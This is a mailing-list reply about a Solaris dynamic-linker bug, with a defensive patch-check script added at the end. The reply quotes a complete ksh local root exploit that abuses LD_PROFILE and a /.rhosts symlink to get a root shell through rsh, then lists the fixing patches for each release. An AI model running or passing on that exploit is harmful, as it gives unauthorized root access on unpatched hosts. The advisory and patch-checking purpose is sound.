>works on solaris 2.6 sparc anyway...
>
>#! /bin/ksh
># LD_PROFILE local root exploit for solaris
># [EMAIL PROTECTED] 19990922
>umask 000
>ln -s /.rhosts /var/tmp/ps.profile
>export LD_PROFILE=/usr/bin/ps
>/usr/bin/ps
>echo + + > /.rhosts
>rsh -l root localhost csh -i

This is bug 4150646 (or rather, 1241843, which resurfaced after an
extensive rewrite of the dynamic linker).

It's been fixed in Solaris 7 and with the following patches in other
releases:

103242-07: SunOS 5.5: linker patch
103243-07: SunOS 5.5_x86: linker patch
103627-11: SunOS 5.5.1: Linker patch
103628-10: SunOS 5.5.1_x86: Linker patch
105490-07: SunOS 5.6: linker patch
105491-05: SunOS 5.6_x86: linker patch

The bug was originally fixed in 5.5.1 and back patched; I rediscovered that
it was back in 2.6 (which also meant it was in the process of being patched
back into 5.5/5.5.1, but I think those patches were held up until the
regression was fixed); this was all well before S7 was released.

The original bug was also fixed in the following patches:

102049-05: SunOS 5.4: linker fixes
102303-05: SunOS 5.4: POINT PATCH: linker fixes
102304-05: SunOS 5.4_x86: POINT PATCH: linker fixes
102778-03: SunOS 5.4_x86: linker patch

Casper
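
Added example, not part of the original message: a shell check that reads `showrev -p` output and reports whether the linker patch listed above for a 5.5, 5.5.1 or 5.6 host is installed at the fixed revision or later. The function names, the `uname -r` / `uname -p` arguments and the sample listing are assumptions made for illustration.

```shell
# Added example (constructed, not from the original post).
# Needs a POSIX awk; on Solaris use nawk instead of /usr/bin/awk.

# Minimum fixed linker patch per release/arch, from the list in the message.
required_patch() {  # $1 = `uname -r` value, $2 = `uname -p` value
    case "$1/$2" in
        5.5/sparc)   echo 103242-07 ;;
        5.5/i386)    echo 103243-07 ;;
        5.5.1/sparc) echo 103627-11 ;;
        5.5.1/i386)  echo 103628-10 ;;
        5.6/sparc)   echo 105490-07 ;;
        5.6/i386)    echo 105491-05 ;;
        *)           return 1 ;;   # release not covered by that list
    esac
}

# Reads `showrev -p` output on stdin; succeeds if the patch named in $1
# (base-revision) is installed at that revision or a later one.
patch_at_least() {
    awk -v want="$1" '
        BEGIN { split(want, w, "-"); ok = 0 }
        $1 == "Patch:" {
            split($2, p, "-")
            if (p[1] == w[1] && p[2] + 0 >= w[2] + 0) ok = 1
        }
        END { exit (ok ? 0 : 1) }'
}

# Prints FIXED, VULNERABLE (need <patch>) or UNKNOWN.
ld_profile_status() {  # $1 = release, $2 = arch, stdin = showrev -p output
    # Solaris 7 reports 5.7 and ships with the fix, per the message.
    if [ "$1" = "5.7" ]; then echo FIXED; return 0; fi
    need=$(required_patch "$1" "$2") || { echo UNKNOWN; return 0; }
    if patch_at_least "$need"; then
        echo FIXED
    else
        echo "VULNERABLE (need $need)"
    fi
}

# Constructed sample of `showrev -p` output (not from a real host).
SAMPLE='Patch: 105181-05 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWcsu
Patch: 105490-04 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWcsu'

printf '%s\n' "$SAMPLE" | ld_profile_status 5.6 sparc
```

On a live host the call would be `showrev -p | ld_profile_status "$(uname -r)" "$(uname -p)"`. A later patch that replaces the listed ID under a different number is not detected by this check.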